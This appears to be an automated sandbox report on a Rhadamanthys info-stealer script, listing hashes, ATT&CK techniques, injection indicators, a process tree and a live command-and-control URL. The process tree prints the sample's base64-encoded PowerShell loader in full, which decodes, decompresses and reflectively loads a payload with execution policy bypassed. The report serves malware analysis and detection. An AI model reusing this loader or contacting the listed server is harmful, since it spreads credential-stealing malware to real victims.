rhadamanthys | 8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974

General

Target

rsDymE.vbs
Size

506KB
MD5

7fba6758ee02d6fbd69db7bb5de82029
SHA1

7c759c4a7681da6e916d8dd80ecfb125f4bf49f5
SHA256

8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974
SHA512

15c49c436bf5ed535f646f263e70e80f47de620a553a9f7a8a88482385eec5812970fdc0f69b915efa6006a58b16fbf47980f2fa34f54344cbe77ac28cc75722
SSDEEP

12288:0KaH9AkQqyuC+4MXBRNAIPyLKhaDw7JZJGjdbS4VZZ4Ph:89AkJyd+XXBzAIKOUU7Foxn4p

Score

10^/10

rhadamanthys discovery execution stealer

Malware Config

Extracted

Family

rhadamanthys

C2

https://deadmunky.nl:5403/68efc67ee981034e6b329438/h7bgh43h.758up

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Rhadamanthys family
rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3808 created 2168	3808	RegAsm.exe	51

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1604	powershell.exe
3008	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3008 set thread context of 3808	3008	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3636	3808	WerFault.exe	96
4720	3808	WerFault.exe	96

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dialer.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4432	Notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1604	powershell.exe
1604	powershell.exe
3008	powershell.exe
3008	powershell.exe
3808	RegAsm.exe
3808	RegAsm.exe
3092	dialer.exe
3092	dialer.exe
3092	dialer.exe
3092	dialer.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 4204 wrote to memory of 1016	4204	WScript.exe	86
PID 4204 wrote to memory of 1016	4204	WScript.exe	86
PID 1016 wrote to memory of 1604	1016	cmd.exe	88
PID 1016 wrote to memory of 1604	1016	cmd.exe	88
PID 1016 wrote to memory of 1604	1016	cmd.exe	88
PID 1016 wrote to memory of 3008	1016	cmd.exe	94
PID 1016 wrote to memory of 3008	1016	cmd.exe	94
PID 1016 wrote to memory of 3008	1016	cmd.exe	94
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3008 wrote to memory of 3808	3008	powershell.exe	96
PID 3808 wrote to memory of 3092	3808	RegAsm.exe	98
PID 3808 wrote to memory of 3092	3808	RegAsm.exe	98
PID 3808 wrote to memory of 3092	3808	RegAsm.exe	98
PID 3808 wrote to memory of 3092	3808	RegAsm.exe	98
PID 3808 wrote to memory of 3092	3808	RegAsm.exe	98
PID 2352 wrote to memory of 4688	2352	cmd.exe	118
PID 2352 wrote to memory of 4688	2352	cmd.exe	118

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2168
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rsDymE.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\rsDymE.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgInJzRHltRS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\rsDymE.ps1' -Encoding UTF8"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\rsDymE.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3808
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 612
        5⤵
        Program crash
        
        PID:3636
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 604
        5⤵
        Program crash
        
        PID:4720

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3808 -ip 3808
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3808 -ip 3808
1⤵
PID:2108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\system32\cscript.exe
  cscript rsDymE.vbs
  2⤵
  PID:4688

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\rsDymE.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:4432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
a664a1606ea03248d672304474bd942e

SHA1
206a4b7dbcc9381cc714e16c74e2960a6bb68290

SHA256
fe55be97bc2631c70ed0a621691cc1778a09226cc62ece7ff5a1e1a121bfc31a

SHA512
b3bb6536dfe4a07bc5e0a82266ae4503d252b4a6d498344c45c60d6c44780ddbcc431aa7f8b186c833bcee4f710b68354a9651f4a42d85dbf94c6dc049aba4be

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3mpigf5.amm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rsDymE.vbs

Filesize
506KB

MD5
10bf63f06e1e9d324f2d56875b1c1b6b

SHA1
3c1b112a0fc86a83474c4915bd115f95025fcf6c

SHA256
70e95faef86711f8e4dc5ea4fe3a2665b1e0c76169f92d2f79cbd7b97a1778cf

SHA512
3a6be61d41b9044eb56dddbbb704c08cb503cb2cafa79433b0bcf90291e443b8dfabaf9a4a627d878edf51e56ba7a0f5e9a4da2c3588f13f25eaf83cdb0dd490

Download Submit
C:\Users\Admin\rsDymE.bat

Filesize
488KB

MD5
95e465b1ef996d3968a93ddbf5eba3da

SHA1
60fedee18bb55594ae6cf5a888e3135845ee8b7b

SHA256
0334ee6012ab68c0952a2b92e5977f687c2e278e6c5854554935bf344f6a6fae

SHA512
c6dcb8a2d8e91e8f770278ea20597bbc905387ece940841e5f0317eec117dd772ff8af1ce5fb69e3cfad4a9d0624685d2741d462b1c69a555bf25b1ba774c475

Download Submit
C:\Users\Admin\rsDymE.ps1

Filesize
1KB

MD5
6cc71c25ffb24ada904a5fc8671b08c5

SHA1
cf421c6b8f009a9b50f6c968669b5ae20a8475aa

SHA256
ecc925ef3557e4387d89ce5f16781f13c5c32ab4f30302a29cac1b54356314d0

SHA512
d131952d62403bd65a94e6d4b5231283088e65a7a944ab6fe7b15c81670d003e1003d01749ae89d37e56c8891ef2f1f92b874ced45b97a7a81cc62cc6a55d033

Download Submit
memory/1604-8-0x0000000005420000-0x0000000005A48000-memory.dmp

Filesize
6.2MB

Download
memory/1604-11-0x0000000005BA0000-0x0000000005C06000-memory.dmp

Filesize
408KB

Download
memory/1604-10-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/1604-21-0x0000000005C50000-0x0000000005FA4000-memory.dmp

Filesize
3.3MB

Download
memory/1604-22-0x0000000006160000-0x000000000617E000-memory.dmp

Filesize
120KB

Download
memory/1604-23-0x00000000061A0000-0x00000000061EC000-memory.dmp

Filesize
304KB

Download
memory/1604-24-0x0000000007AA0000-0x000000000811A000-memory.dmp

Filesize
6.5MB

Download
memory/1604-25-0x0000000006680000-0x000000000669A000-memory.dmp

Filesize
104KB

Download
memory/1604-29-0x00000000747F0000-0x0000000074FA0000-memory.dmp

Filesize
7.7MB

Download
memory/1604-9-0x00000000053C0000-0x00000000053E2000-memory.dmp

Filesize
136KB

Download
memory/1604-7-0x00000000747F0000-0x0000000074FA0000-memory.dmp

Filesize
7.7MB

Download
memory/1604-6-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

Filesize
216KB

Download
memory/1604-5-0x00000000747FE000-0x00000000747FF000-memory.dmp

Filesize
4KB

Download
memory/3008-31-0x0000000005CC0000-0x0000000006014000-memory.dmp

Filesize
3.3MB

Download
memory/3008-45-0x0000000007BC0000-0x0000000008164000-memory.dmp

Filesize
5.6MB

Download
memory/3008-46-0x0000000007690000-0x000000000772C000-memory.dmp

Filesize
624KB

Download
memory/3008-47-0x00000000029C0000-0x00000000029CA000-memory.dmp

Filesize
40KB

Download
memory/3008-43-0x0000000007570000-0x0000000007606000-memory.dmp

Filesize
600KB

Download
memory/3008-44-0x0000000006820000-0x0000000006842000-memory.dmp

Filesize
136KB

Download
memory/3092-56-0x0000000000790000-0x0000000000799000-memory.dmp

Filesize
36KB

Download
memory/3092-59-0x00007FFCB03F0000-0x00007FFCB05E5000-memory.dmp

Filesize
2.0MB

Download
memory/3092-61-0x00000000764B0000-0x00000000766C5000-memory.dmp

Filesize
2.1MB

Download
memory/3092-58-0x0000000002510000-0x0000000002910000-memory.dmp

Filesize
4.0MB

Download
memory/3808-51-0x0000000003FD0000-0x00000000043D0000-memory.dmp

Filesize
4.0MB

Download
memory/3808-55-0x00000000764B0000-0x00000000766C5000-memory.dmp

Filesize
2.1MB

Download
memory/3808-53-0x00007FFCB03F0000-0x00007FFCB05E5000-memory.dmp

Filesize
2.0MB

Download
memory/3808-52-0x0000000003FD0000-0x00000000043D0000-memory.dmp

Filesize
4.0MB

Download
memory/3808-50-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3808-48-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download

Resubmissions

Analysis

Sharing